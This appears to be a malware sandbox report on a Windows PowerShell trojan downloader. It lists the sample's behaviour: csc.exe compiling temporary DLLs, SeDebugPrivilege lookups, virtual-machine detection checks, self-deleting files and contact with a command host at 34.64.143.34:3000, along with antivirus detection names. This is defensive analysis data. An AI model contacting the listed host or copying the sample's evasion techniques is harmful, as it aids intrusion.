file	C:\Users\test22\AppData\Local\Temp\c0nnsbkt.dll
file	C:\Users\test22\AppData\Local\Temp\w5n2hyfx.dll

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 14, 2021, 3:35 p.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 14, 2021, 3:35 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Sept. 14, 2021, 3:35 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\w5n2hyfx.cmdline"
cmdline	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\c0nnsbkt.cmdline"

Communicates with host for which no DNS query was performed (1 event)

host

34.64.143.34

Deletes executed files from disk (2 events)

file	c:\Users\test22\AppData\Local\Temp\CSC871B.tmp
file	C:\Users\test22\AppData\Local\Temp\RES872B.tmp

File has been identified by 15 AntiVirus engines on VirusTotal as malicious (15 events)

Bkav	W32.AIDetect.malware2
Alibaba	TrojanDownloader:Win32/PsDownload.b2df3262
ESET-NOD32	a variant of Generik.KNMGHYR
Paloalto	generic.ml
Kaspersky	Trojan-Downloader.Win32.PsDownload.jpl
Avast	Win32:Trojan-gen
McAfee-GW-Edition	Artemis
Sophos	Mal/Generic-S
Ikarus	Trojan.SuspectCRC
Avira	TR/Dldr.Agent.skkoc
Cynet	Malicious (score: 99)
AhnLab-V3	Malware/Win.Generic.C4630742
McAfee	Artemis!DCBCD8C4FCDD
Fortinet	W32/PsDownload.KNMGHYR!tr
AVG	Win32:Trojan-gen

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\c0nnsbkt.cmdline"
parent_process	powershell.exe				martian_process	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\w5n2hyfx.cmdline"

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Program Files\Windows Journal\Journal.exe

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 events)

dead_host	34.64.143.34:3000
dead_host	192.168.56.102:49186

admin.php

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All